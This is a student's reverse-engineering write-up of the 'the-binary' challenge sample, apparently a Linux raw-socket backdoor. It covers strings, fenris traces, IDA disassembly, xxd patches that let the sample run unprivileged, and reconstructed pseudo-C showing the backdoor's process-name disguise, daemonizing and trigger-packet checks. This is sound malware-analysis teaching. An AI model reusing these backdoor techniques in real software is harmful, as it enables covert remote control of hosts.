Analysis of “the-binary”  

by Albert Bendicho (bendi#at#redestb.es). Student at the "honeyp.edu" university.

Introduction

In this document we’re going to go through the process of reverse engineering an application. The goal of the document is to provide the answers to “The Reverse Challenge” as well as to learn the basics of reverse-engineering on the way. This has been my first reverse engineering effort, so I've tried to write the document I would have liked to find to help me on the effort.

First checks on “the-binary”

Initial steps

The first step is to ensure that we have downloaded “the-binary” provided for the challenge correctly and without alteration by runing md5(R*) on it.

  [albert@sandbox reverse-ch]$ md5sum the-binary.tar.gz
  857f9f32cbe7a277710d4fa57670316a  the-binary.tar.gz

After this we’re ready to unpack the file;

  [albert@sandbox reverse-ch]$ tar -xzvf the-binary.tar.gz
  reverse/
  reverse/README.html
  reverse/the-binary

The “file” command

To have an idea of what we’re dealing with we check the kind of file;

[albert@sandbox reverse]$ file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically
linked, stripped

As expected from such kind of file it’s stripped, but it’s interesting to note that it’s statically linked, what means that it will have all the library functions it uses inside. This could be done for the following reasons;

 As it is an ELF binary, we can try to get more information through “objdump”

The “objdump” command

The new information we get is this;

[albert@sandbox the-binary]$ objdump -x the-binary

the-binary:     file format elf32-i386
the-binary
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x08048090

Program Header:
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00024222 memsz 0x00024222 flags r-x
    LOAD off    0x00024228 vaddr 0x0806d228 paddr 0x0806d228 align 2**12
         filesz 0x0000c094 memsz 0x00011970 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .init         00000008  08048080  08048080  00000080  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  1 .text         0001f53c  08048090  08048090  00000090  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  2 __libc_subinit 00000004  080675cc  080675cc  0001f5cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .fini         00000008  080675d0  080675d0  0001f5d0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  4 .rodata       00004c4a  080675d8  080675d8  0001f5d8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .data         0000c084  0806d228  0806d228  00024228  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  6 .ctors        00000008  080792ac  080792ac  000302ac  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  7 .dtors        00000008  080792b4  080792b4  000302b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  8 .bss          000058dc  080792bc  080792bc  000302bc  2**2
                  ALLOC
  9 .note         00000d5c  00000000  00000000  000302bc  2**0
                  CONTENTS, READONLY
 10 .comment      00000ea6  00000000  00000000  00031018  2**0
                  CONTENTS, READONLY
objdump: the-binary: no symbols

The most interesting part is that we have a “__libc_subinit” header, which means that we have a “libc” linked in.

Next, we take a look inside the binary with “strings”

The “strings” comand

[albert@sandbox reverse]$ strings the-binary

We get a long set of strings. Looking arround we find the following intersting entries;

First Group;

[mingetty]
/tmp/.hj237349
/bin/csh -f -c "%s" 1> %s 2>&1
TfOjG
/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.
PATH
HISTFILE
linux
TERM
/bin/sh
/bin/csh -f -c "%s"

All this entries seem quite interesting. First what looks lake a faked “process name” for “ps”, next a temporary file name, a format string to execute one command redirecting standard I/O, what looks like a password (TfOjG), environment variables for a shell, a shell invocation command and another format string to execute one command, but this time without redirection. This looks as it could be the constants of the application.

Second group;

The second group comes inmediatelly after the first, and seems also to be a group of constants. Some of them as a sample;

RESOLV_SERV_ORDER
RESOLV_SPOOF_CHECK
warn
warn off
RESOLV_MULTI
RESOLV_REORDER
RESOLV_ADD_TRIM_DOMAINS
RESOLV_OVERRIDE_TRIM_DOMAINS
gethostby*.getanswer: asked for "%s", got CNAME for "%s"
gethostby*.getanswer: asked for type %d(%s), got %d(%s)    

They seem to be DNS related, so perhaps the resolv library is linked, but a “strings” on our resolv library doesn’t seem to match. We check with;

[albert@sandbox reverse]$ strings /usr/lib/libresolv.a| grep RESOLV_OVERRIDE_TRIM_DOMAINS
[albert@sandbox reverse]$

No output, so it really seems that we missed this one. We’ll try to find which library it belongs to;

[albert@sandbox reverse]$ find /usr/lib -name "*.a" -exec grep RESOLV_OVERRIDE_TRIM_DOMAINS {} \;
Binary file /usr/lib/libc.a matches
[albert@sandbox reverse]$

So it seems we found the library it belongs to; “libc”. On the other hand it was normal to expect this library to be there, as it is the most basic one and we had already spotted it with “objdump”

Third group;

This seemed to be another group at first, as there was quite a lot of “garbage” and the next string found was not related to DNS, but after the analysis on the second group, we see that the string “@(#) The Linux C library 5.3.12” clearly defines what “libc” version we’re dealing with.

A little research through “rpmfind.net” allows us to see that this library is the one distributed by default with “RedHat 6.2”. So perhaps “the-binary” was compiled in this platform.

This also gives us a hint on the process we’re doing. We’re looking for strings on a different library (we’re using RedHat 7.1, with LibC , so it would be possible that some strings don’t match. To avoid this we download the sources for “The Linux C library 5.3.12” and search for the strings there.

While still checking strings we come with a really special one;

*nazgul*

Nazgul is the name of a kind of “Dark Spirit” in the novel “The Lord of the Rings”. Appropriate name for a hacking thing. But doing our check on the LibC Sources

[albert@sandbox albert]$ grep -Hr \*nazgul\* /usr/src/redhat/SOURCES/libc/*
/usr/src/redhat/SOURCES/libc/nls/msgcat.h:#define MCMagic              "*nazgul*"
/usr/src/redhat/SOURCES/libc/nls/msgcat.h:   char      magic[MCMagicLen];     
/* Magic cookie "*nazgul*" */
[albert@sandbox albert]$

we find out (surprisingly) that it’s part of it!! That reminds us something; always check your assumptions. They can be wrong!!

We keep looking and don’t notice anything suspicious or that doesn’t match our LibC 5.3.12 source files. So our research through “strings” is done.

Our next step will be to start with the disassembly and execution of the application, but for that we have to set up a proper environment. The binary we want to execute could be malicious.

  

Preparing an execution environment

It would be good to set up one environment with VMWare like described in (R*), but we don’t have a VMWare license. So we’ll go with what we have; 2 PCs. On one of them we run Win98, on the other Linux 7.1 (it could have been better with a 6.2 as is the one that comes with LibC 5.3.12, or Linux 7.3, the most current, but we only have 7.1 at hand).

We connect them with a crossed ethernet cable and configure them on a private network. The Linux box with IP 192.168.1.1 and the Win98 with IP 192.168.1.7.

On the Win98 box we install;

On the Linux box we install;

We configure the Linux box in a way that it sends ALL the network traffic to the Win98 box. We do it configuring 2 things;

We will try to execute the application as a non-privileged user, as we don't know what kind of action this application can take. So we create a user for running this application and we'll check with Tripwire from time to time to ensure that our system hasn't been affected in any way.

First run of “the-binary” with fenris

Now we have our environment ready, so we'll try to execute the binary We will try to execute the application as a non-privileged user, as we don't know what kind of action this application can take. So we create a user for running this application and we'll check with Tripwire from time to time to ensure that our system hasn't been affected in any way. 

Our first run of "the-binary" will be with fenris so we can see what happens. The fenris distribution we use initially comes with a set of signatures from a "libc5" library. That will come handy to analyze our binary, as the system we use has a "libc6" library but as we've seen "the-binary" comes with a "libc5" library.

Befor runing "the-binary" we start our sniffer in the Win98 box. Then we go with our first run of "the-binary";

[tstusr@sandbox reverse]$ ../fenris/fenris ./the-binary
fenris 0.04b (2699, 22396) - program execution path analysis tool
Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
* WARNING: cannot load 'fnprints.dat' fingerprints database.
+++ Executing './the-binary' (pid 25725, static) +++
25725:-- SYS exit (-1) = ???
+++ Process 25725 exited with code 255 +++
************************************************************
* Hmm, call me suspicious. I tried to skip libc prolog for *
* this application, but it seems to me I skipped way too   *
* much. Maybe this program is too smart for me? Maybe it   *
* was compiled in some exotic place? Consider using -s     *
* option for now, and contact my author!                   *
************************************************************
>> Exit condition: no more processes to trace
    

Ok, so we do as the application suggest, use "-s" which reading the documentation informs us that will "disables automatic prolog detection" tracing all the libc initialization. We have no problem with that. So here we go;

[tstusr@sandbox reverse]$  ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary 
fenris 0.02b (2334, 22396) - program execution path analysis tool
Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
<CONTINUES, Snipped for brevity>

We get a not-so-long output that we inspect visually. It seems that the application has exited. Before looking through the output we check our sniffer and see no relevant activity. We also ensure with "tripwire" that everything is OK. Then we take a look through the output and we see the following;

14719:01  local fnct_8 ()
14719:01  + fnct_8 = 0x8048134
14719:01  # No matches for signature CD18AE48.
14719:02   local fnct_9 (0, 0, 0)
14719:02   + fnct_9 = 0x805720c
14719:02   # Matches for signature 5527EA2B: geteuid libc_geteuid 
14719:03    SYS geteuid () = 503
14719:03    <805721a> cndt: if-above block (signed) +16 executed
14719:02   ...return from function = <void>
14719:02   <8048182> cndt: conditional block +8 executed
14719:02   local fnct_10 (-1)
14719:02   + fnct_10 = 0x8055fbc
14719:02   # No matches for signature 09B18AA8.

There's a call to a "local fnct_10 (-1)", this seems to be the "start of the end", as a "-1" value usually means an error. We see that the previous call was a call go "geteuid" that returns 503, the UID of the tstusr. So it seems that if "the-binary" is not run by root it detects it and stops execution.

We could run it as root, but that's not advisable at all as we still don't know much about the functionality of "the-binary". So the other solution is to patch the program so we can skip this check.

To do that we need to disassemble "the-binary" and look where to modify the code. For that purpose we disassemble "the-binary" with IdaFree.

Dissasembling “the-binary”

Once in IdaFree we load "the-binary" which we have first copied into a directory on the Win98 box.

This gives us a nice disassembly of "the-binary". On the previous execution of fenris we've seen that the call to geteuid (fnct_9) was made from "fnct_8", that starts at position 0x8048134, so we go to the routine in that possition and look for a call to the routine at position 0x805720c (fnct_9). We find it easily. The code is;

.text:0804816B                 mov     [ebp+var_44D8], edx
.text:08048171                 mov     [ebp+var_44C4], 10h
.text:0804817B                 call    sub_0_805720C
.text:08048180                 test    eax, eax
.text:08048182                 jz      short loc_0_804818C
.text:08048184                 push    0FFFFFFFFh
.text:08048186                 call    sub_0_8055FBC
.text:0804818B                 nop
    

Using the information we got from our fenris execution we can make this more readable by using IdaFree to rename the fucntions we have identified so far. These are;

After  renaming these 2 functions we get;

.text:0804816B                 mov     [ebp+var_44D8], edx
.text:08048171                 mov     [ebp+var_44C4], 10h
.text:0804817B                 call    geteuid
.text:08048180                 test    eax, eax
.text:08048182                 jz      short loc_0_804818C
.text:08048184                 push    0FFFFFFFFh
.text:08048186                 call    error_exit
.text:0804818B                 nop

That's more understandable than before. Now we can see that the "jz short loc_084818C" jump is executed for root. We can just change that and make it the other way around, so changing a "jz" for a "jnz". Looking at the intel reference we find that we have to change the value 0x74 at position 0x08048182 (opcode for a "jz") with a 0x75 (opcode for a "jnz").

So now that we know what we want to achieve it's time to patch "the-binary" 

Patching “the-binary”  

We could use the "-P" option of fenris to patch "on-the-fly" the binary. That would be;

[tstusr@sandbox reverse]$  ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -P 0x8048182:0x75 ./the-binary 

But we later on will want to also inspect it with "gdb". There the way to patch it is by the "set" command 

gdb> set *0x8048182=0x75

It's also foreseeable that we will end up with more patches than this one, so it's better to have a patched binary. Looking around we find that xxd (part of the vim package) has the ability to patch binaries in a convenient way. First we have to find out what position in the binary file corresponds later on to 0x8048182. 

We can check this visually using IdaFree and it's "Options\ Dump/Normal view" or by pressing F4. This gives us a dump so we can see where our "0x74" is. With xxd we obtain a pretty much identical kind of dump and we can easily spot the point by comparing visually. We have to modify the byte at position 0000182. That gives us the path to follow in further modifications; we have to subtract 0x8048000 from the memory location to modify to get the file offset to modifiy. 

So we prepare a patched binary with the following commands;

[tstusr@sandbox reverse]$ cp the-binary the-binary-NOROOT
[tstusr@sandbox reverse]$ echo '0000182: 75' | xxd -r - the-binary-NOROOT 

Now we have a clear way to patch "the-binary". Because we will apply more than one patch and we might try to patch different parts, we can set up a simple script that patches all the parts. So we write a script as;

#!/bin/sh
if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi
cp the-binary-dressed $1
 
# Run without being root
echo '0000182: 75' | xxd -r - $1

A complete script with all "developed" patches is given on the extra files that come with this analysis.

Cycling through the "execution/disassembly/patch" cycle

Our goal is to check the activity that "the-binary" produces. For that we keep using fenris to try to find out. That will bring us to a cycle of 

So we're going to discuss the problems found and how to get around them without the detail of how to perform each step.

Problem with "fork".

The next execution of fenris 

[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT

generates a longer output where we find;

14836:02   local fnct_13 ()
14836:02   + fnct_13 = 0x80571e8
14836:02   # Matches for signature BCF79788: fork libc_fork vfork 
14836:03    SYS fork () = 14837
14836:-- SIGNAL 17 (Child exited) - will not be handled
14836:03    <80571f6> cndt: if-above block (signed) +16 executed
14836:02   ...return from function = <void>
14836:02   <80481df> cndt: conditional block +7 executed
14836:02   local fnct_14 (0)
14836:02   + fnct_14 = 0x8055fbc
14836:02   # No matches for signature 09B18AA8.

So there's a fork(), and looking on how things go, we see that the application calls the function at 0x8055fbc which we know is the one that we named "error_exit" before. 

So it seems that the "interesting" work gets done by the child process of the fork().

Looking at the fenris documentation (README file) we see that we have an option to trace child processes; "-f". So we try again;

[tstusr@sandbox reverse]$ ../fenris/fenris -f -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT

with the following outcome;

14850:03    fork () = 14851
>> OS error       : Operation not permitted [1]
>> Error condition: PTRACE_ATTACH failed
>> This condition occoured while tracing pid 14850 (eip 80571f0).
>> Traced 293 user CPU cycles (0 libcalls, 13 fncalls, 4 syscalls).
 
**************************************************
* If you believe this is because of programming  *
* error, please report above message, along with *
* information about your working environment and *
* traced application, to the author of this      *
* utility (e-mail: lcamtuf@coredump.cx). Thanks! *
**************************************************

Again, no luck, as the documentation states, "-f" might have some problems, and they're affecting us.

So we take another approach; if we want to follow the child process, just change the code that makes it jump one way or another. In this case we have to change another "jz" for another "jnz" at position 0x080481df.

We apply the patch and try again

We get the same outcome, with another fork() call. So we repeat our process and move on. This leads to a file patched with;

#!/bin/sh
if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi
cp the-binary $1
      
# Run without being root
echo '0000182: 75' | xxd -r - $1
    
# Switch behaviour of parent and child on first fork
echo '00001DF: 75' | xxd -r - $1
     
# Switch behaviour of parent and child on second fork
echo '0000200: 75' | xxd -r - $1

When we run the patched binary again with fenris we get a large amount of output, so we better use the "-o" option on fenris to get all this output in a file.

[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -o fenris.out \
> ./the-binary-NOROOT-NOFORK1-NOFORK2 

Fenris doesn't stop, we stop it after about 10 seconds of execution.

Problem with "socket" and "socketcall_10"

Looking at fenris.out becomes a hard task but we can still find some things. We can see a lot of repetition on what it seems to be two different loops. But looking between the two main "repetition groups" we find the following;

14897:02   local fnct_20 (2, 3, 11)
14897:02   + fnct_20 = 0x8056cf4
14897:02   # No matches for signature 93D3112B.
14897:03    SYS socket (PF_INET, SOCK_RAW, 11 [nvp]) = -1 (Operation not permitted)
14897:03    <8056d22> cndt: if-above block (signed) +13 executed
14897:02   ...return from function = <void>
14897:02   // function has accessed non-local memory:

So it seems that "the-binary" is trying to open a RAW socket. It obviously can't because only root can do that. Later on the second "repetition" group we see a lot of;

14897:02   local fnct_21 (-1, l/bffff334, 2048, 0)
14897:02   + l/bffff334 (maxsize 2060) = stack of fcnt_8 (0 down)
14897:02   # No matches for signature 16E2ECD3.
14897:03    SYS socketcall_10 (0xbfffb610 <invalid>) = -9 (Bad file descriptor)
14897:03    <8056b78> cndt: if-above block (signed) +13 executed

So it seems that we're trying to do some kind of socketcall with a bad file descriptor. Probably the one we haven't been able to open on the previous "socket" operation.

It's quite obvious that moving through this output would be too hard, so it's time to do some analysis on the disassembly of "the-binary".

Identifying functions in "the-binary"

We can see that IdaFree has identified a big amount of functions. We can be pretty sure that most of them are library functions, but which?

Obviously it would be nice to recognize as much of the library functions as possible. We have several ways to achieve this;

Without doubt the first two options are the most appropiate (FLIRT or Dress, both signature based). But the third one also comes handy to reinforce the output generated by this options (at least dress, as we haven't tried FLIRT).

The reason for the reinforcement comes from the fact that several functions have identical signatures, for example getsockopt and setsockopt. Dress can't tell which one is which. With our third option (manual recognition of "INT 80h" calls) we can clearly tell one from the other.

So next step we "dress" "the-binary".

[tstusr@sandbox reverse]$ ../fenris/dress -F ../fenris/support/fn-libc5.dat the-binary the-binary-dressed
dress - stripped static binary recovery tool by <lcamtuf@coredump.cx>
* WARNING: cannot load 'fnprints.dat' fingerprints database.
[+] Loaded 5400 fingerprints...
[*] Code section at 0x08048090 - 0x080675cc, offset 144 in the file.
[*] For your initial breakpoint, use *0x8048090
[+] Locating CALLs... 371 found.
[+] Matching fingerprints...
[*] Writing new ELF file:
[+] Cloning general ELF data...
[+] Setting up sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment 
[+] Preparing new symbol tables...
[+] Copying all sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment 
[+] All set. Detected fingerprints for 209 of 371 functions.

(Note: the WARNING message is because we're not executing dress from the fenris directory or providing the path to fnprints.dat, but that's not a problem since we only want the fingerprints of the functions on libc5 to be used).

Now we take "the-binary-dressed" to IDA and watch the new output. That looks completely different than before!

If we look at the list of functions (menu "View/Functions") we'll see that we got a lot of the library functions identified. Even then, we still have some confusion with "recvfrom___sendto" and "recvfrom___sendto_0" among others. If we need to clarify any of these confusions we can try with the third method described before. In the specific case of the "recvfrom___sendto" and "recvfrom___sendto_0" it resolves the doubt immediately.

But the third method also comes handy to identify some functions not identified by dress, like for example;

and some others (less useful) like "wait4" and "brk".

So the third method proves to be really useful on reaching to some points that the "fingerprint recognizers" fail.

Now we're ready to navigate through the code more easily and try to understand what happens.

Identifying variables in the functions.

We have seen that the places where we've had to patch the binary so far where on the same function. So we'll start looking at this function. 

Here we have to be really patient and persistent to start getting all the information out of the disassembly. This is quite an intuitive task, but we can make progress with some "semi-automatic" recognition of variables (both global and local).

To do that we will rename some variables so we can tell the type they are. We'll look at the library calls, look at the type of their parameters and then name the variable pushed in the stack accordingly. For that some times we'll have to track the assignment of some registers as they are pushed on the stack but have been assigned a value a long time ago.

We can also see, specially at the beginning of this function, that some variables are used to point to others, so we know they will be pointers. 

Another thing we can do to "organize" the variables is to define structures for the things we recognize. 

We'll take as an example the first call at "recv" in position ".text:080482C5" (in fact its not a random example, as we get quite a lot of information from this one).

Initially we have;

push    0
push    800h
lea     eax, [ebp+var_800]
push    eax
mov     ecx, [ebp+var_44C8]
push    ecx
call    recv
mov esi, eax

This translates to "C" as;

"register esi" = recv ( var_44C8, &var_800, 800h, 0);

We see in the libc5 sources that "recv" structure has the following prototype;

int recv ((int __sockfd, void *__buff, size_t __len, unsigned int __flags);

So now we know that var_44C8 is a SocketFD and that var_800 is an array of at least 2048 (800h) bytes long.

But we can push it even further. We know that this "recv" call will receive an IP paket on it's buffer, so we know what structure the "var_800" buffer will hold!

So we define this structure (basically) by using IdaFree's structure definition interface.

We go to "View/Structure" and insert the following structures;

0000 iphdr           struc ; (sizeof=0x14)
0000 ihl_version     db ?
0001 TOS             db ?
0002 len             dw ?
0004 id              dw ?
0006 frag_off        dw ?
0008 TTL             db ?
0009 protocol        db ?
000A crc             dw ?
000C saddr           dd ?
0010 daddr           dd ?
0014 iphdr           ends
0014
0000 ; -------------------------------------
0000
0000 rawIPpacket     struc ; (sizeof=0x800)
0000 hdr             iphdr ?
0014 data            db 2028 dup(?)
0800 rawIPpacket     ends

Then we go to where the "var_800" variable is defined (the fastest way is to get in top of the "var_800" invocation in the code we're looking and hit enter) and define it as of having the structure "rawIPpacket". For IdaFree to allow to do this we will have first to undeclare (with the "u" key) all the variables from var_7FF to var_7EA, then we will be able to go to "var_800" select "Edit/Struct/Delcare struct var..." and select our "rawIPpacket" structure.

After recognizing more variables this way, we get quite a change on our variable names;

From This To This
var_44F0 = dword ptr -44F0h
var_44EC = dword ptr -44ECh
var_44E8 = dword ptr -44E8h
var_44E4 = dword ptr -44E4h
var_44E0 = dword ptr -44E0h
var_44DC = dword ptr -44DCh
var_44D8 = dword ptr -44D8h
var_44D4 = dword ptr -44D4h
var_44D0 = dword ptr -44D0h
var_44CC = dword ptr -44CCh
var_44C8 = dword ptr -44C8h
var_44C4 = dword ptr -44C4h
var_44C0 = dword ptr -44C0h
var_44BC = byte ptr -44BCh
var_43BC = byte ptr -43BCh
var_11D8 = byte ptr -11D8h
var_11C8 = word ptr -11C8h
var_11C6 = word ptr -11C6h
var_11C4 = dword ptr -11C4h
var_11B8 = byte ptr -11B8h
var_1190 = byte ptr -1190h
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
var_FFE = byte ptr -0FFEh
var_FFD = byte ptr -0FFDh
var_FFC = byte ptr -0FFCh
var_FFB = byte ptr -0FFBh
var_FFA = byte ptr -0FFAh
var_FF9 = byte ptr -0FF9h
var_FF8 = byte ptr -0FF8h
var_FF7 = byte ptr -0FF7h
var_FF6 = byte ptr -0FF6h
var_FF5 = byte ptr -0FF5h
var_FF4 = byte ptr -0FF4h
var_FF3 = byte ptr -0FF3h
var_FF2 = byte ptr -0FF2h
var_800 = byte ptr -800h
var_7FF = byte ptr -7FFh
var_7FF = byte ptr -7FFh
var_7FE = byte ptr -7FEh
var_7FD = byte ptr -7FDh
var_7FC = byte ptr -7FCh
var_7F0 = byte ptr -7F0h
var_7EF = byte ptr -7EFh
var_7EE = byte ptr -7EEh
var_7ED = byte ptr -7EDh
var_7EC = byte ptr -7ECh
var_7EA = byte ptr -7EAh
arg_4 = dword ptr 0Ch
var_RandomValue?= dword ptr -44F0h
var_0Value? = dword ptr -44ECh
var_3rdBufferPtr= dword ptr -44E8h
var_AddrPtr = dword ptr -44E4h
var_2ndBufPtr = dword ptr -44E0h
var_tmpFD = dword ptr -44DCh
var_BufDat2Ptr = dword ptr -44D8h
var_BufDatPtr = dword ptr -44D4h
var_BuffPtr = dword ptr -44D0h
var_acceptFD = dword ptr -44CCh
var_mainSD = dword ptr -44C8h
var_AcceptAddrLen= dword ptr -44C4h
var_setsockopt_optval= dword ptr -44C0h
var_Buf256Bytes = byte ptr -44BCh
var_TCPRecvBuf = byte ptr -43BCh
var_AcceptAddr = byte ptr -11D8h
var_bindSockAddr= sockaddr_in ptr -11C8h
var_Addr = byte ptr -11B8h
var_3rdBuffer = byte ptr -1190h
var_2ndBuf = byte ptr -1000h
var_Buf = rawIPpacket ptr -800h

 

 

 

 

 

 

 

 

 

 

 

 


 

 

This will enormously simplify the reading of the code.

We can also change some global variable names this way. Here we count with extra help from IdaFree which gives us a "view/Cross reference" option to identify where and how every variable is accessed. 

Our final result for the uninitialized variables (.bss segment) is 

.bss:0807E770*gPID            dd ?
.bss:0807E770*
.bss:0807E774*gPID2           dd ?
.bss:0807E774*
.bss:0807E778*gWord1          dd ?
.bss:0807E778*
.bss:0807E77C gDouble1        dd ?
.bss:0807E780*gbdaddr         dd ?
.bss:0807E780*
.bss:0807E784*gWord2_0_or_2   dd ?

which is a big improvement from the initial situation. We also recover some sense on the constants (.rodata segment) where we can recognize the "[mingetty]" string we saw on the "strings" analysis.

Overall, we can now start navigating our main function with a lot more clues than initially.

Reverse-Engineering the “inital stepsof the main function

With all the variables set, we're now ready to start looking at the assembly code and try to understand what it does.

The routine starts by preparing the stack, allocating space in it, and saving some registers. Next it initializes some variables and then does the check to see if it's running as root. If it's not it exits (position .text:08048186). We have already developed a patch to prevent this.

Next it seems that it's doing something strange, but a cautious analysis reveals that it changes argv[0] (the string by which the program was invoked) and changes it to "[mingetty]". Obviously it tries to disguise itself. This also reinforces the idea that we had that this was the "main()" function of the application, as the only parameter accessed corresponds to what we would expect (argv[0]).

After that it forks twice, with a call to setsid() in the middle and allowing only the child to continue execution. This converts the application in a daemon. We have also developed a patch to prevent this.

We're now at loc_0_804820C. Here the application does a chdir("/") and closes all the standard file descriptors (input, output and error), which is also a common practice in daemons.

Next it initializes some variables and does a call to an unknown function with time as a parameter. Like;

strange_function ( time() );

We don't know what this function does, and as it's result (if it has any) seems to be completely ignored we will leave the function for the moment.

The next call is quite obvious and it brings us to the problem we found with the "socket" call. It is a call like this 

var_mainSD = socket(AF_INET, SOCKRAW, 0Bh);

Opening raw sockets is only allowed to root, but we still don't know what this binary do, so we'll want to avoid using raw sockets. We'll deal with that shortly.

But first we see what else the application does. After opening the socket it SIG_IGNores (by calling signal(xxx,SIG_IGN)) the signals SIGHUP (1), SIGTERM (0Fh) and SIGCHLD (17h). It assigns some pointer variables to point where they have to and then does;

"register esi" = recv (
      var_mainSD, &var_Buf, 2048, 0);

Once this is done it does three checks on the received data;

If any of this conditions fail it goes to the end of a big loop where it does a "usleep(10000)" and goes back to the "recv" call we have already seen.

Once the checks are satisfied, it calls a function with the following parameters

decrypt_function ( esi-16h, var_BufDat2Ptr, var_2ndBufPtr);

Knowing that;

We can deduct that probably this function will transform all the bytes received in var_Buffer.Data, from the 3rd element to the end and leave the results of such transformation in "var_2ndBuf". Knowing the kind of binary we're talking about and (because it was announced in the challenge) that it has an "encryption" mechanism, we can be quite sure that this is the "decrypt_function".

After this transformation is done, the second byte of the var_2ndBuf is used for a "case" statement where there are 12 different cases. So this byte has to have a value between 1 and 12 to be able to execute one of the cases. If the value is not between this values the binary will jump to the default case, where (as we've seen before) it will "usleep(10000)" before going back to the "recv" call.

So to wrap-up, the structure of the main function is aproximately as follows;

main (int argc, char* argv[])
{
     INIT_VARIABLES;
     
     if ( geteuid()!= 0 ) error_exit(1);
     
     SET (argv[0] = "[mingetty]");
     
     signal ( SIGCHLD, SIG_IGN );
     if ( fork()!=0 ) error_exit(0);
     setsid();
     signal ( SIGCHLD, SIG_IGN );
     if ( fork()!=0 ) error_exit(0);
     chdir("/");
     close (stdin);
     close (stdout);
     close (stderr);
     
     INIT_MORE_VARS;
     
     strange_function ( time() );
     
     var_mainSD = socket (AFINET, SOCKRAW, 0Bh);
     
     signal ( SIGHUP, SIG_IGN );
     signal ( SIGTERM, SIG_IGN );
     signal ( SIGCHLD, SIG_IGN );

     INIT_EVEN_MORE_VARS;
     
     for (;;) {
          bytes_recv = recv (var_mainSD, &var_Buf, 2048, 0);
          if ((var_Buf.hdr.TOS==0Bh) && (var_Buf.data[0]==2) && (bytes_recv > 200)) {
               decrypt_function ( bytes_recv - 16h, &(var_Buf.data[2]), &var_2ndBuf );
               switch ( var_2ndBuf[1] ) {
                    case 1 : //SOMETHING
                    case 2 :
                    ..(etc).. up to
                    case 12: //SOMETHING
                         break;
                    default : ; 
               }
          }
          usleep(10000);
     }     
}

Now it would be nice to check all our assumptions. It would be good to see the execution of the binary providing some input that satisfies the first 3 checks and see what happens with the input provided (and what the decrypt_function does). But to do that we have to first solve a pending problem.

Avoiding to recv on a Raw Socket 

Now what we want is to see what was happening with "socket" and "socketcall" quite a long time ago. We focus again on the code related to the "socket" and "recv" function;

.text:0804825C                 push    0Bh
.text:0804825E                 push    3
.text:08048260                 push    2
.text:08048262                 call    socket
.text:08048267                 mov     [ebp+var_mainSD], eax
                  :
                  :
.text:080482B0                 push    0
.text:080482B2                 push    800h
.text:080482B7                 lea     eax, [ebp+var_Buf]
.text:080482BD                 push    eax
.text:080482BE                 mov     ecx, [ebp+var_mainSD]
.text:080482C4                 push    ecx
.text:080482C5                 call    recv

That we've seen it translates to

var_mainSD = socket (AF_INET, SOCKRAW, 0x0b);
                         :
recv (var_mainSD, &var_Buf, 2048, 0);

So the problem is that we cannot open a Raw Socket and later on read information from it. Here one fast patch comes to mind. We know that previously the binary closes the standard file descriptors (standard input, output and error). The solution could be to use the standard input to "recv" the information.

For that we do the following;

So our new "prepare-patch" script now looks like;

#!/bin/sh
if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi
cp the-binary-dressed $1

# Run without being root
echo '0000182: 75' | xxd -r - $1

# Switch behaviour of parent and child on first fork
echo '00001DF: 75' | xxd -r - $1

# Switch behaviour of parent and child on second fork
echo '0000200: 75' | xxd -r - $1

# Avoid closing STDIN
echo '0000218: 9090 9090 90' | xxd -r - $1

# Substitute socket call for a xor ax,ax
echo '0000262: 6631 c090 90' | xxd -r - $1
# Read instead of recv on main()
echo '00002C6: 42F0' | xxd -r - $1

After applying it we're ready to send "packets" through the standard input and move forward.

Let's try our patch. We will generate a packet consisting of 256 bytes with the consecutive values from 0 to 255 (use your preferred way to achieve such a file). We will modify the bytes at offsets 09h and 16h to allow it to comply with the 3 checks we have seen before.

The prepared packet looks like this;

[tstusr@sandbox reverse]$ xxd tstpacket 
0000000: 0001 0203 0405 0607 080b 0a0b 0c0d 0e0f  ................
0000010: 1011 1213 0215 1617 1819 1a1b 1c1d 1e1f  ................
0000020: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f   !"#$%&'()*+,-./
0000030: 3031 3233 3435 3637 3839 3a3b 3c3d 3e3f  0123456789:;<=>?
0000040: 4041 4243 4445 4647 4849 4a4b 4c4d 4e4f  @ABCDEFGHIJKLMNO
0000050: 5051 5253 5455 5657 5859 5a5b 5c5d 5e5f  PQRSTUVWXYZ[\]^_
0000060: 6061 6263 6465 6667 6869 6a6b 6c6d 6e6f  `abcdefghijklmno
0000070: 7071 7273 7475 7677 7879 7a7b 7c7d 7e7f  pqrstuvwxyz{|}~.
0000080: 8081 8283 8485 8687 8889 8a8b 8c8d 8e8f  ................
0000090: 9091 9293 9495 9697 9899 9a9b 9c9d 9e9f  ................
00000a0: a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf  ................
00000b0: b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf  ................
00000c0: c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf  ................
00000d0: d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf  ................
00000e0: e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef  ................
